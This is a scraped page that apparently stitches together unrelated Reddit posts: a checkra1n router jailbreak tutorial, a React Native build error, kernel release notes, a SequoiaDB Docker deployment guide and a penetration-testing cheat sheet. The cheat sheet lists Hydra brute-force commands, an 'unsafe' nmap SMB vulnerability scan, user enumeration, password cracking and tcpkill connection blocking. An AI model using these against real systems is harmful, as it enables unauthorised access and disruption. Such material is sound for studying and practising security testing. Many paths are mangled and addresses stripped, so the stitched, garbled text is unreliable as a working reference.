linux - Chmod 777 to a folder and all contents - Stack ...

[Tutorial] Run Checkra1n on any OpenWRT & Checkra1n compatible router (not just Linksys)

*Don't try this on a main router because you could permanently brick the router. Read through this entire post before starting and only attempt this if you're familiar with Terminal and you know what you're doing.\*
If you saw this post but don't have a Linksys router, you might still be in luck.



  1. Search for your router on the OpenWRT website and open the page for your router. On the page, look for the "Installation" heading, and download the "Firmware OpenWRT Install" for your router model.
  2. Download the appropriate Checkra1n binary from the Checkra1n website.
  3. Connect your computer to your router via ethernet and power on the router. You need the router's IP address, if you don't know what it is, do the following. Visit that IP address in your browser, and if a web login is available, then you're good so far.
  4. Log in with your router username and password (if you've never changed the credentials, Google the default ones). After logging in, unplug any other cables from the router besides power and the ethernet cable connected to your computer. Look for a way to upload a custom firmware file, and upload the file you downloaded from OpenWRT. Upgrade to that firmware.
  5. Once that's done, visiting the router's IP (which is now will take you to the OpenWRT login page. Log in with the username "root" and leave the password field blank.
    1. (Optional) If you would like, you can perform a software reset from within OpenWRT's webpage to prevent filesystem corruption. After you do that, log back into the router.
  6. Change the router's password. This is required for SSH access.
    1. (Optional) Enable wireless connections on your router from Network > Wireless. If you need help, check out this. If you do this, you won't need the Ethernet cable anymore.
  7. SSH into the router. (If you're on Windows, enable SSH connect). In CMD/Terminal, type ssh [email protected]. When it asks for the password, use the router password.
  8. Look for any directories with at least 20MB free space. You can do this by typing the command df. The free directory will most likely be the /tmp Directory. (Please note that the /tmp directory is cleared every time the router turns on...) Once you find a directory, Type exit to close the SSH connection.
  9. You should be back on CMD/Terminal. Then, type this command to transfer the Checkra1n file to the router: scp PATH/TO/CHECKRA1N/FILE [email protected]:PATH/TO/FREE/DIRECTORY
  10. You're almost done, we need to adjust permissions now. SSH into the router again and type these commands: cd PATH/TO/FREE/DIRECTORY, chmod 777 checkra1n
  11. Connect your iDevice via USB Port, and put it in iTunes Recovery Mode. Then type ./checkra1n -c -v
  12. Put the device into DFU Mode, and hopefully it boots jailbroken (if you see errors then press CTRL+C to stop checkra1n, and type ./checkra1n -c -v again since reliability is bad)
If you do use the /tmp directory, repeat steps 9-12 every time you power on your router
submitted by WishingTie09120 to jailbreak [link] [comments]

Android build failed when using react native CLI - Resource linking failed: ZipArchive didn't find signature at start of LFH, Invalid APK offset

Hey friends, I've been trying to get my environment set up to develop React Native apps on my Linux machine but I couldn't figure out how to fix this error when I start to run it on my Android device/emulator.
I'm fairly new to React Native and this is my first time trying the React Native CLI instead of using Expo so any help would be very much appreciated.
It fails on Task :app:processDebugResources when 'installing the app' (after running npx react-native run-android), with error message
FAILURE: Build failed with an exception. * What went wrong: Execution failed for task ':app:processDebugResources'. > A failure occurred while executing$ActionFacade > Android resource linking failed AAPT: W/ziparchive(68779): Zip: didn't find signature at start of lfh, offset=33511520 error: failed to open APK: Invalid offset. * Try: Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights. * Get more help at BUILD FAILED in 1s error Failed to install the app. Make sure you have the Android development environment set up: Run CLI with --verbose flag for more details. Error: Command failed: ./gradlew app:installDebug -PreactNativeDevServerPort=8081 FAILURE: Build failed with an exception. * What went wrong: Execution failed for task ':app:processDebugResources'. > A failure occurred while executing$ActionFacade > Android resource linking failed AAPT: W/ziparchive(68779): Zip: didn't find signature at start of lfh, offset=33511520 error: failed to open APK: Invalid offset. * Try: Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights. * Get more help at BUILD FAILED in 1s at makeError (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/execa/index.js:174:9) at /home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/execa/index.js:278:16 at processTicksAndRejections (internal/process/task_queues.js:97:5) at async runOnAllDevices (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/@react-native-community/cli-platform-android/build/commands/runAndroid/runOnAllDevices.js:94:5) at async Command.handleAction (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/@react-native-community/cli/build/index.js:186:9) 
where the ziparchive(XXXXX) numbers change each time. Please let me know if further output would help (i.e. with stacktrace or info flags).
For context, I've been following the React Native CLI Quickstart guide for Linux as the development OS and Android as the target OS. The distribution I'm using is Manjaro Linux with KDE Plasma on a Dell XPS 13 9360. The issue starts at the "Running your React Native application" section when running npx react-native run-android after starting the metro bundler (npx react-native start).
I believe it has to do with my environment and not the code as I am using the starter template when initializing the project and it builds fine when I tested it on some cloud service (
Here is my system information when I run npx react-native info:
System: OS: Linux 4.19 Manjaro Linux CPU: (8) x64 Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz Memory: 2.70 GB / 7.52 GB Shell: 5.0.16 - /bin/bash Binaries: Node: 13.8.0 - ~/.nvm/versions/node/v13.8.0/bin/node Yarn: 1.22.4 - /usbin/yarn npm: 6.13.6 - ~/.nvm/versions/node/v13.8.0/bin/npm Watchman: 4.9.0 - /usbin/watchman SDKs: Android SDK: Not Found IDEs: Android Studio: 3.6 AI-192.7142.36.36.6308749 Languages: Java: 1.8.0_242 - /usbin/javac Python: 3.8.2 - /usbin/python npmPackages: @react-native-community/cli: Not Found react: 16.11.0 => 16.11.0 react-native: 0.62.1 => 0.62.1 npmGlobalPackages: *react-native*: Not Found 
What worries me is that the above shows Android SDK: Not Found but I see Android SDK Platform 28 when I go to Settings > Android SDK in Android Studio and the corresponding folder exists in my Android home. Similarly for Intel x86 Atom_64 System Image also.
I went through and tried
but unfortunately none of that worked for me.
I also found two forum threads with seemingly identical errors, however, both of them were not resolved.
Interestingly, I found an article explain what the error may mean
My understanding from that is that an incompatible Gradle may be causing the issue.
My android/gradle/ has distributionUrl=https\:// and Android Studio's File > Project Structure > Project has Gradle Version to 6.0.1.
Any insights? Any and all help is very much appreciated. Thanks!
submitted by stinkboye to reactnative [link] [comments]

v3 beta-R4 for Android 5.1.0 flo + deb

The new kernel release has been in test-mode for 14 days (April 27 - May 11). 14 users participated in testing. During this time, this thread was set to non-public mode. All comments, that have been exchanged, are attached below. To make most sense of this info, you want to read the comments bottom-up (chronological order). Start with "Initial release April 27 2015".
May 11, 2015 - Today I handed out install images to another 16 users and made this thread accessible to all users. Now 30 people in total are using this kernel on Android 5.1.0.
May 12, 2015 - Handed out 12 copies on request and 20 copies to old users and previous testers. 62 copies now delivered in total.
To request your kernel install images for 5.1.0, please send an email with subject "request v3 beta-R4". You will find the two install images within 24 hrs (or so) in your personal folder. Please report you findings below. Thank you.
Safety exception: in the first week (until May 18), I will NOT deliver the new kernel to very new users (who have joined April 10 or after). (removed May 13.)
May 14, 2015 - Uploaded installers for all "deb" users.
May 18, 2015 - Uploaded installers for all "flo" users.
May 22, 2015 - 180+ users have downloaded R4 build 61 since April 27 .
Installation procedure is same as it ever was: after installing the target 5.1.0 Android release via factory image ("LMY47O"), you install a custom recovery (TWRP) via fastboot/bootloader. For this, your bootloader needs to be unlocked. You will then be able to install three files via recovery:
This is all you need to do.
Before you start upgrading, you should make a full backup of your current system in recovery. I strongly suggest you create your backup onto an external USB flash drive. TWRP can do this and it can also quickly and reliably restore from such a backup image. Please make use of this.
The new features are listed below (under "build 57").
v3 beta-R4 build 61:
v3 beta-R4 build 58:
v3 beta-R4 build 57:
Android 5.1.0 improvements over 5.0.x:
Easycap drivers - old and new:
You need to edit your file (once), to tell the system which Easycap drivers to load. This way you can switch between the old and the new drivers.
To create for the old (legacy), single-file easycap driver:
su echo "insmod /system/vendoeasycap.ko" > /data/local/ chmod 777 /data/local/ 
To create for the new easycap stk1160 driver:
su echo "insmod /system/vendostk1160.ko" > /data/local/ chmod 777 /data/local/ 
The new EasyCap drivers support faster device initialization (cold start). However, the new EasyCap stk1160 driver does NOT seem to work with all stk1160-based devices.
The Sabrent Easycap and USBTV Easycap devices do NOT appear to be working well with the new drivers made available via this kernel release. You should consider getting a STK1160 based frame grabber device to use with this release. See my USBTV related remarks.
The new EasyCap drivers are using a different video pixel encoding compared to the old/legacy driver. As a result, when using the new drivers, you need to change the default video encoding in VCam from YUYV to UYVY (once).
On first run, VCam will start up in PAL mode. If you are using a NTSC camera, you will need to switch VCam from PAL to NTSC (once).
Read: Automatic rear camera: 3 options
On-power CPU Governor:
This setting allows you to select different power saving modes (aka CPU underclocking).
The ability to switch CPU modes is a standard Linux kernel feature.
Here you can find more detailed CPU Governor info.
If you don't care for underclocking, just leave the default "interactive" setting selected. Most people may not need to change this ever.
I make this functionality available, because what looks like a reliable fixed power line to the tablet, may not be so very constant and reliable, if you are using your tablet in the car (or something similar). The assumption (of stock Android), that you want to run interactive mode, only because there is external power available, may be wrong.
I am myself using "ondemand" mode for now and I really don't feel much of difference. However, I assume the CPU's to run a little cooler overall. And I expect the 3D-navigation app, that I run for hours, to eat up less power overall, etc.
The "powersave" setting will not be of much interest to most people. It may be useful on some very hot days, I don't know. This is something some people may want to try. But probably not.
The Nexus 7 kernel does not support "conservative" mode. This may be a Snapdragon thing, I'm not sure. I know that other Android chipset's do support "conservative" mode also.
"Performance" is also not supported - at all. This setting only makes sense on servers. But I'm not even sure about this.
It's called "On power CPU Governor", because this setting only affects the CPU mode, when external power is attached. The battery driven mode is not influenced by this setting. On battery power, the tablet will behave 100% stock.
Btw, my desktop PC is practically always running in "ondemand" mode.
Previous v3 features
Users who are upgrading from v2.0/4.4.4 straight to v3/5.1.0 should at least take a brief look at the top messages of previous v3 releases: v3 beta-R1, v3 beta-R2 and v3 beta-R3.
submitted by timur-m to timurskernel [link] [comments]

How to implement rapid deployment of SequoiaDB cluster with Docker

How to implement rapid deployment of SequoiaDB cluster with Docker
Container technology, represented by Docker and Rocket, is becoming more and more popular. It changes the way companies and users create, publish, and use distributed applications, and it will bring its value to the cloud computing industry in the next five years. The reasons for its attractiveness are as follows:

1)Resource Independence and Isolation

Resource isolation is the most basic requirement of cloud computing platforms. Docker limits the hardware resources and software running environment through the Linux namespace, cgroup, and is isolated from other applications on the host machine, so it does not affect each other.

Different applications and service are “ship” and “unship” with the unit of container. Thousands of “containers” are arranged on the “container” ship. Different companies, different types of “goods” (programs, components, operating environments, dependencies required to run applications) remain independent.

2) Environmental Consistency

The development engineer builds a docker image after finishing the application development. Based on this image, the container is packaged with various “parts of goods” (programs, components, operating environment, dependencies required to run the application). No matter where the container is: development environment, test environment or production environment, you can ensure that the number of “goods” in the container is exactly the same, the software package will not be missing in the test environment, and the environmental variables will not be forgotten in the production environment. The development and production environment will not cause the application to run abnormally due to the dependency of installing different versions. This consistency is benefited by the fact that the “build docker image” is already sealed into the “container” when delivery, and each link is transporting this complete “container” that does not need to be split and merged.

3) Lightweight

Compared to traditional virtualization technology (VM), the performance loss of using docker on cpu, memory, disk IO, network IO has the same level or even better performance. The rapid creation, start-up, and destruction of containers have received a lot of praise.

4)Build Once, Run Everywhere

This feature has attracted many people. When the “goods” (application) is exchanged between “cars”, “trains”, “ships” (private clouds, public clouds, etc.), it only need to migrate the “docker container” which conform to the standard specifications and handling mode, which has reduced the time-consuming and labor-intensive manual “loading and unloading” (online and off-line applications), resulting in huge time labor cost savings. This feature makes it possible for only a few operators in the future to operate the container clusters for ultra-large-scale loading online applications, just as a few machine operators in the 1960s can unload a 10,000-class container ship in a few hours.

Container technology nowadays is also widely used in the database field. Its “Build Once, Run Everywhere” feature greatly reduces the time spent on installing the configuration database environment. Because even for DBAs who have been working with databases for many years, installing the configuration database environment is still a seemingly simple but often a complex work. Of course, other advantages of container technology are also well used in the application of databases.

As an excellent domestic distributed NewSQL database, SequoiaDB has been recognized by more and more users. This article takes Docker as an example, focusing on how to quickly build a SequoiaDB image with Dockerfile, and how to use the container to quickly build and start the SequoiaDB cluster to application system.

Build SequoiaDB image

How to install docker and configure repositories is not the focus of this article. There are many related technical articles on the Internet. It should be pointed out that this article uses Aliyun Repository, because the speed of uploading images to Docker official repository is unflattering. How to register and use the Aliyun Repository can refer to the article (

STEP 1: Create Dockerfile using following simple statements:
# Sequoiadb DOCKERFILES PROJECT # -------------------------- # This is the Dockerfile for Sequoiadb 2.8.4 # # REQUIRED FILES TO BUILD THIS IMAGE # ---------------------------------- # (1) # (2) # # HOW TO BUILD THIS IMAGE # ----------------------- # Put all downloaded files in the same directory as this Dockerfile # Run: # $ sudo docker build -t sequoiadb:2.8.4 . # # Pull base image FROM ubuntu # Environment variables required for this build ENV INSTALL_BIN_FILE="" \ INSTALL_SDB_SCRIPT="" \ INSTALL_DIR="/opt/sequoiadb" # Copy binaries ADD $INSTALL_BIN_FILE $INSTALL_SDB_SCRIPT $INSTALL_DI # Install SDB software binaries RUN chmod 755 $INSTALL_DI$INSTALL_SDB_SCRIPT \ && $INSTALL_DI$INSTALL_SDB_SCRIPT \ && rm $INSTALL_DI$INSTALL_SDB_SCRIPT 
The content of the script are as follows:
chmod 755 $INSTALL_DI$INSTALL_BIN_FILE $INSTALL_DI$INSTALL_BIN_FILE --mode unattended rm $INSTALL_DI$INSTALL_BIN_FILE echo 'service sdbcm start' >> /root/.bashrc 
It should to be noted that this example uses SequoiaDB Enterprise Edition 2.8.4. You can also download the community version from the official website of SequoiaDB (select tar package, download and extract), and replace the media name in this example. SequoiaDB website download address:

STEP 2: Create an image
The root user executes:
Docker build -tsequoiadb: 2.8.4 .If you are a normal user, use sudo:Sudo docker build -tsequoiadb: 2.8.4 .

STEP3: Login to Aliyun Repository
Docker login — xxx is the account you registered with Alibaba Cloud.

STEP4: View local SequoiaDB image id
docker images

STEP5: Mark local image and put it into Aliyun Repository
04dc528f2a6f is the author’s local sequoiadb image id, is the Aliyun Repository address, 508mars is the author’s name in Aliyun, SequoiaDB is the image name, and latest is the tag.

Start SequoiaDB cluster with container

Docker’s network defaults to bridge mode, and containers in bridge mode have the following characteristics:
1) Containers in the same host can ping each other
2) Containers in different hosts can not ping each other

However, the SequoiaDB cluster requires interoperability between all nodes, so if the container with SequoiaDB is running on different hosts, the default network mode of docker is obviously inappropriate. There are many ways to solve the connectivity problem between different host containers. This article only introduces the weave virtual network solution, because weave also provides a DNS server function. When deploying SequoiaDB clusters with containers using this function, it is no longer necessary to modify /etc/hosts inside each container, which greatly simplifies the steps of automated deployment.

STEP1: Install the weave network
Curl -s -L -o /uslocal/bin/weave
Chmod a+x /uslocal/bin/weave
It needs to install on all hosts, the author uses three virtual machines as hosts: sdb1, sdb2 and sdb3.

STEP2: Start the weave network
Weave launch
The weave image will be downloaded the first time it is started.

STEP3: Download the SequoiaDB image from Aliyun Repository
Docker pull

STEP4: Create a docker mounted volume on all hosts
Cd /home/sdbadmin
Mkdir -p data/disk1 data/disk2 data/disk3
Mkdir -p conf/local
Chmod -R 777 data
Chmod -R 777 conf
The location of the mounted volume can be customized, but in general, it needs to create two types of mounted volumes, one for storing aggregate data, such as data/disk1, data/disk2, data/disk3, and so on. The other is used to store node configuration information, such as conf/local in this example. Thus, even if the container is deleted by mistake, you can still start a new container to play the role of the container that was accidentally deleted.

STEP5: Start the container
sdb1: weave stop weave launch eval $(weave env) docker run -dit --name sdbserver1 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local sdb2: weave stop weave launch eval $(weave env) docker run -dit --name sdbserver2 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local sdb3: weave stop weave launch eval $(weave env) docker run -dit --name sdbserver3 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local is the IP address of sdb1 and 11810 is the externally exposed cluster access port. The volume on the host that stores the node configuration information must be hung in the /opt/sequoiadb/conf/local directory of the container. The volume that holds the table data can be mounted to the user-defined directory. However, once the cluster is created, it cannot be changed. The machine name must be specified when starting the container, because after the cluster is built, the machine name will be saved in the system table of SequoiaDB. If the machine name of the node is inconsistent with the system table, it will not be added to the cluster. In the scenario of using weave, it is recommended to use the--name option. Do not use--hostname to set the machine name. The latter will prevent weave from adding the machine name to the DNS server. Weave will automatically set the machine name according to the value of --name, and add the weave.local domain name after the machine name. Also, it will add it to the DNS server.

STEP6: Copy the script that created the SequoiaDB cluster to the container docker cp create_cluster.js sdbserver1:/data
The content of create_cluster.js is as follows:
var array_hosts = ["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]; var array_dbroot = ["/data/disk1/sequoiadb/database","/data/disk2/sequoiadb/database","/data/disk3/sequoiadb/database"]; var port_sdbcm = "11790"; var port_temp_coord = "18888"; var cataloggroup = {gname:"SYSCatalogGroup", gport:"11820", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]}; var array_coordgroups = [ {gname:"SYSCoord", gport:"11810", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]} ]; var array_datagroups = [ {gname:"dg1", gport:"11830", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}} ,{gname:"dg2", gport:"11840", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}} ,{gname:"dg3", gport:"11850", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}} ]; var array_domains = [ {dname:"allgroups", dgroups:["dg1", "dg2", "dg3"], doptions:{AutoSplit:true}} ]; println("启动临时协调节点"); var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm); oma.createCoord(port_temp_coord, array_dbroot[0]+"/coord/"+port_temp_coord); oma.startNode(port_temp_coord); println("创建编目节点组:"+cataloggroup.ghosts[0]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport); var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord); db.createCataRG(cataloggroup.ghosts[0], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport); var cataRG = db.getRG("SYSCatalogGroup"); for (var i in cataloggroup.ghosts) { if (i==0) {continue;} println("创建编目节点: "+cataloggroup.ghosts[i]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport); var catanode = cataRG.createNode(cataloggroup.ghosts[i], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport); catanode.start(); } println("创建协调节点组"); var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord); var coordRG = db.createCoordRG(); for (var i in array_coordgroups) { for (var j in array_coordgroups[i].ghosts) { println("创建协调节点组:"+array_coordgroups[i].ghosts[j]+" "+array_coordgroups[i].gport+" "+array_dbroot[0]+"/coord/"+array_coordgroups[i].gport); coordRG.createNode(array_coordgroups[i].ghosts[j], array_coordgroups[i].gport, array_dbroot[0]+"/coord/"+array_coordgroups[i].gport); } } coordRG.start(); println("删除临时协调节点") var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm); oma.removeCoord(port_temp_coord); println("创建数据节点组") var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport); var k=0; for (var i in array_datagroups) { var dataRG = db.createRG(array_datagroups[i].gname); for (var j in array_datagroups[i].ghosts) { println("创建数据节点:"+array_datagroups[i].gname+" "+array_datagroups[i].ghosts[j]+" "+array_datagroups[i].gport+" "+array_dbroot[k]+"/data/"+array_datagroups[i].gport+" "+array_datagroups[i].goptions) dataRG.createNode(array_datagroups[i].ghosts[j], array_datagroups[i].gport, array_dbroot[k]+"/data/"+array_datagroups[i].gport, array_datagroups[i].goptions); } dataRG.start(); k++; } println("创建域"); var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport); for (var i in array_domains) { println("创建域:"+array_domains[i].dname+" "+array_domains[i].dgroups+" "+array_domains[i].doptions) db.createDomain(array_domains[i].dname, array_domains[i].dgroups, array_domains[i].doptions ); } 
docker exec sdbserver1 su - sdbadmin -c "sdb -f /data/create_cluster.js"



SequoiaDB uses container technology to achieve rapid cluster deployment, which greatly simplifies the installation and deployment of beginners. Later, the author will also do some optimization on SequoiaDB image production, because the image currently made is a bit large. The main reason is that using the ADD or COPY command to copy the CD-ROM toward the Docker container will generate a new image1, although the finally generated image2 has been deleted CD-ROM, it is above image1, and the size of image2 still contains the CD-ROM. Thus, it is best to use ADD command to copy tar package(ADD automatically decompress ) or use a method as follows:
RUN mkdir -p /ussrc/things \ && curl -SL \ | tar -xJC /ussrc/things \ && make -C /ussrc/things all 
submitted by sequoiadb to u/sequoiadb [link] [comments]

noob friendly notes part 2

Recon and Enumeration

nmap -v -sS -A -T4 target - Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p--A -T4 target - As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover

SMB enumeration

ls /usshare/nmap/scripts/* | grep ftp - Search nmap scripts for keywords
nbtscan - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing


nbtscan -v - Displays the nbtscan version
nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
nbtscan -O file-name.txt target(s) - Sends output to a file
nbtscan -H - Generate an HTTP header
nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
nbtscan -V - Enable verbose mode
nbtscan -n - Turns off this inverse name lookup, for hanging resolution
nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query
nbtscan -m - Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

Other Host Discovery

netdiscover -r - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site

SMB Enumeration

nbtscan - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc

Mounting File Shares

mount /mnt/nfs - Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \win-server\share password /user:domain\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line
apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

nc -v 25 - telnet 25 - Basic versioning / finger printing via displayed banner

SNMP Enumeration

nmpcheck -t 192.168.1.X -c public snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

DNS Zone Transfers

nslookup -> set type=any -> ls -d - Windows DNS zone transfer
dig axfr - Linux DNS zone transfer


dnsrecon -d TARGET -D /usshare/wordlists/dnsmap.txt -t std --xml ouput.xml

HTTP / HTTPS Webserver Enumeration

nikto -h - Perform a nikto scan against target
dirbuster - Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

python /usshare/doc/python-impacket-doc/examples / 192.168.XXX.XXX - Enumerate users from SMB 192.168.XXX.XXX 500 50000 dict.txt - RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk public -v1 192.168.X.XXX 1 |grep |cut -d” “ -f4 - Enmerate users from SNMP
python /usshare/doc/python-impacket-doc/examples/ SNMP 192.168.X.XXX - Enmerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) - Search for SNMP servers with nmap, grepable output


/usshare/wordlists - Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

hydra -l USERNAME -P /usshare/wordlistsnmap.lst -f 192.168.X.XXX ftp -V - Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usshare/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V - Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usshare/wordlistsnmap.lst 192.168.X.XXX smtp -V - Hydra SMTP brute force

Password Cracking

John The Ripper - JTR
john --wordlist=/usshare/wordlists/rockyou.txt hashes - JTR password cracking
john --format=descrypt --wordlist /usshare/wordlists/rockyou.txt hash.txt - JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show - JTR forced descrypt brute force cracking

Exploit Research

searchsploit windows 2003 | grep -i local - Search exploit-db for exploit, in this example windows 2003 + local esc exploit kernel <= 3 - Use google to search for exploits
grep -R "W7" /usshare/metasploit-framework /modules/exploit/windows/* - Search metasploit modules using grep - msf search sucks a bit

Linux Penetration Testing Commands

Linux Network Commands

netstat -tulpn - Show Linux network ports with process ID's (PIDs)
watch ss -stplu - Watch TCP, UDP open ports in real time with socket summary.
lsof -i - Show established connections.
macchanger -m MACADDR INTR - Change MAC address on KALI Linux.
ifconfig eth0 - Set IP address in Linux.
ifconfig eth0:1 - Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR - Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500 - Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x - Dig reverse lookup on an IP address.
host - Reverse lookup on an IP address, in case dig is not installed.
dig @ -t AXFR - Perform a DNS zone transfer using dig.
host -l nameserver - Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x - Get hostname for IP address.
ip addr add dev eth0 - Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host - Blocks access to from the host machine.
echo "1" > /proc/sys/net/ipv4/ip_forward - Enables IP forwarding, turns Linux box into a router - handy for routing traffic through a box.
echo "" > /etc/resolv.conf - Use Google DNS.

System Information Commands

Useful for local enumeration.

whoami - Shows currently logged in user on Linux.
id - Shows currently logged in user and groups for the user.
last - Shows last logged in users.
mount - Show mounted drives.
df -h - Shows disk usage in human readable output.
echo "user:passwd" | chpasswd - Reset password in one line.
getent passwd - List users on Linux.
strings /uslocal/bin/blah - Shows contents of none text files, e.g. whats in a binary.
uname -ar - Shows running kernel version.
PATH=$PATH:/my/new-path - Add a new PATH, handy for local FS manipulation.
history - Show bash history, commands the user has entered previously.

Redhat / CentOS / RPM Based Distros

cat /etc/redhat-release - Shows Redhat / CentOS version number.
rpm -qa - List all installed RPM's on an RPM based Linux distro.
rpm -q --changelog openvpn - Check installed RPM is patched against CVE, grep the output for CVE.

YUM Commands

Package manager used by RPM based systems, you can pull #some usefull information about installed packages and #or install additional tools.

yum update - Update all RPM packages with YUM, also shows whats out of date.
yum update httpd - Update individual packages, in this example HTTPD (Apache).
yum install package - Install a package using YUM.
yum --exclude=package kernel* update - Exclude a package from being updates with YUM.
yum remove package - Remove package with YUM.
yum erase package - Remove package with YUM.
yum list package - Lists info about yum package.
yum provides httpd - What a packages does, e.g Apache HTTPD Server.
yum info httpd - Shows package info, architecture, version etc.
yum localinstall blah.rpm - Use YUM to install local RPM, settles deps from repo.
yum deplist package - Shows deps for a package.
yum list installed | more - List all installed packages.
yum grouplist | more - Show all YUM groups.
yum groupinstall 'Development Tools' - Install YUM group.

Debian / Ubuntu / .deb Based Distros

cat /etc/debian_version - Shows Debian version number.
cat /etc/*-release - Shows Ubuntu version number.
dpkg -l - List all installed packages on Debian / .deb based Linux distro. Linux User Management
useradd new-user - Creates a new Linux user.
passwd username - Reset Linux user password, enter just passwd if you are root.
deluser username - Remove a Linux user.

Linux Decompression Commands

How to extract various archives (tar, zip, gzip, bzip2 #etc) on Linux and some other tricks for searching #inside of archives etc.

unzip - Extracts zip file on Linux.
zipgrep *.txt - Search inside a .zip archive.
tar xf archive.tar - Extract tar file Linux.
tar xvzf archive.tar.gz - Extract a tar.gz file Linux.
tar xjf archive.tar.bz2 - Extract a tar.bz2 file Linux.
tar ztvf file.tar.gz | grep blah - Search inside a tar.gz file.
gzip -d archive.gz - Extract a gzip file Linux.
zcat archive.gz - Read a gz file Linux without decompressing.
zless archive.gz - Same function as the less command for .gz archives.
zgrep 'blah' /valog/maillog*.gz - Search inside .gz archives on Linux, search inside of compressed log files.
vim file.txt.gz - Use vim to read .txt.gz files (my personal favorite).
upx -9 -o output.exe input.exe - UPX compress .exe file Linux.

Linux Compression Commands

zip -r /di* - Creates a .zip file on Linux.
tar cf archive.tar files - Creates a tar file on Linux.
tar czf archive.tar.gz files - Creates a tar.gz file on Linux.
tar cjf archive.tar.bz2 files - Creates a tar.bz2 file on Linux.
gzip file - Creates a file.gz file on Linux.

Linux File Commands

df -h blah - Display size of file / dir Linux.
diff file1 file2 - Compare / Show differences between two files on Linux.
md5sum file - Generate MD5SUM Linux.
md5sum -c blah.iso.md5 - Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah - Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix - Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file - Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file - Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file - Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf - Remove files and directories without prompting for confirmation.

Samba Commands

Connect to a Samba share from Linux.

$ smbmount //serveshare /mnt/win -o user=username,password=password1 $ smbclient -U user \\server\share $ mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

Breaking Out of Limited Shells

Credit to G0tmi1k for these (or wherever he stole them from!).

